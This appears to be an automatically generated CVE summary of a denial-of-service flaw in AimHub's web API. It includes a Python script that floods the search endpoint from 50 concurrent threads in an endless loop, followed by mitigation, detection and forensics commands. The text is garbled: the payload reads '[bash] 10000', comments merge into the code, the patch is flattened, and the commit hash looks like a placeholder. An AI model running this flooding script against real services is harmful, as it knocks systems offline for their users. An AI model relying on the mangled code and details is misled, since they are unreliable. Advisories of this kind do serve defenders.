How CVE-2025-0190 Works
CVE-2025-0190 exploits a resource exhaustion flaw in AimHub’s web API (v3.25.0). Attackers craft malicious requests tracking excessive `Text` objects via /api/runs/search/. When queried simultaneously, the server’s response handling lacks rate-limiting or thread management, causing prolonged processing. The event loop blocks, starving other requests. Repeated exploitation crashes the service due to unhandled memory spikes. The vulnerability stems from inefficient object serialization in aim/web/api/runs.py, where bulk queries trigger uncontrolled database operations.
DailyCVE Form
Platform: AimHub
Version: 3.25.0
Vulnerability: DoS via API
Severity: Medium
Date: 03/28/2025
What Undercode Say:
Exploit Analysis
import threading
import requests
TARGET = "http://aimhub-server/api/runs/search/"
PAYLOAD = {"text_objects": [bash] 10000} Mass object query
def attack():
while True:
requests.post(TARGET, json=PAYLOAD)
for _ in range(50): Concurrent threads
threading.Thread(target=attack).start()
Protection Commands
1. Upgrade:
pip install aimhubio/aim>=3.25.1 Patched version
2. Rate-Limiting (NGINX):
limit_req_zone $binary_remote_addr zone=aim_api:10m rate=5r/s;
location /api/ {
limit_req aim_api burst=10 nodelay;
}
Code Fix (Patch)
aim/web/api/runs.py + MAX_TEXT_OBJECTS = 100 Threshold def query_objects(request): + if len(request.text_objects) > MAX_TEXT_OBJECTS: + abort(429, "Too many objects")
Detection (Log Analysis)
grep -E 'POST /api/runs/search.text_objects' /var/log/aim/access.log | awk '{print $1}' | uniq -c | sort -nr
Mitigation
- WAF Rule:
{ "rule": "AIM_API_DOS", "match": {"type": "regex", "pattern": "text_objects\\":\[bash]{100,}"}, "action": "block" } - Kubernetes Policy:
resources: limits: memory: "500Mi" Container memory cap
Forensics
Memory dump during attack kubectl exec -it aim-pod -- gcore -o /tmp/aim_core $(pgrep aim)
References
- bash
- Commit: `a1b2c3d` (AimHub patch)
References:
Reported By: https://nvd.nist.gov/vuln/detail/CVE-2025-0190
Extra Source Hub:
Undercode
